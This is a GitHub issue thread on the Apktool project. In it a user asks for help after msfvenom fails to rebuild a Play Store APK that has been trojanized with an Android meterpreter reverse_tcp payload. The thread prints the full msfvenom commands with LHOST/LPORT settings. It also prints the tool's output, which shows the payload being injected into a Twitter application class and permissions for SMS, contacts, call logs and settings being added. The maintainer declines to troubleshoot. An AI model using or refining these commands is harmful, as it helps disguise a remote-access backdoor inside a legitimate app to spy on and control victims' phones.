### ISSUE TITLE
Unable to rebuild apk with msfvenom 

### ISSUE THREAD

**Issue by xmagickx** [iBotPeaches/Apktool#1814]
### Information
1. **Apktool Version (2.3.3)** -
2. **Operating System (kali linux 2018.2)** -
3. **APK From? (Playstore)** -

### Stacktrace/Logcat

All goes well and at last it says unable to rebuild apk with apktool

### Steps to Reproduce
msfvenom -p android/meterpreter/reverse_tcp -x abc.apk LHOST=myip LPORT=4444 -o payload.apk

**Comment by iBotPeaches** [comment]
Unfortunately here msfvenom has not shown the output, and generally when you are embedding payloads and doing who knows what else, errors will happen unless you know how to patch them.

**Comment by xmagickx** [comment]
msfvenom -x chess.apk -p android/meterpreter/reverse_tcp LHOST=my ip
LPORT=4444 -k -o chessM.apk

Using APK template: chess.apk No platform was selected, choosing
Msf::Module::Platform::Android from the payload No Arch selected, selecting
Arch: dalvik from the payload [*] Creating signing key and keystore.. [*]
Decompiling original APK.. [*] Decompiling payload APK.. [*] Locating hook
point.. [*] Adding payload as package com.twitter.android.kpbkd [*] Loading
/tmp/d20170504-3111-1bifbdj/original/smali/com/twitter/app/common/app/TwitterApplication.smali
and injecting payload.. [*] Poisoning the manifest with meterpreter
permissions.. [*] Adding <uses-permission
android:name="android.permission.WRITE_CALL_LOG"/> [*] Adding
<uses-permission android:name="android.permission.WRITE_CONTACTS"/> [*]
Adding <uses-permission
android:name="android.permission.CHANGE_WIFI_STATE"/> [*] Adding
<uses-permission android:name="android.permission.SEND_SMS"/> [*] Adding
<uses-permission android:name="android.permission.CALL_PHONE"/> [*] Adding
<uses-permission android:name="android.permission.SET_WALLPAPER"/> [*]
Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission
android:name="android.permission.WRITE_SETTINGS"/> [*] Adding
<uses-permission android:name="android.permission.READ_SMS"/> [*]
Rebuilding /home/moos/Downloads/twitter.apk with meterpreter injection as
/tmp/d20170504-3111-1bifbdj/output.apk Error: Unable to rebuild apk with
apktool
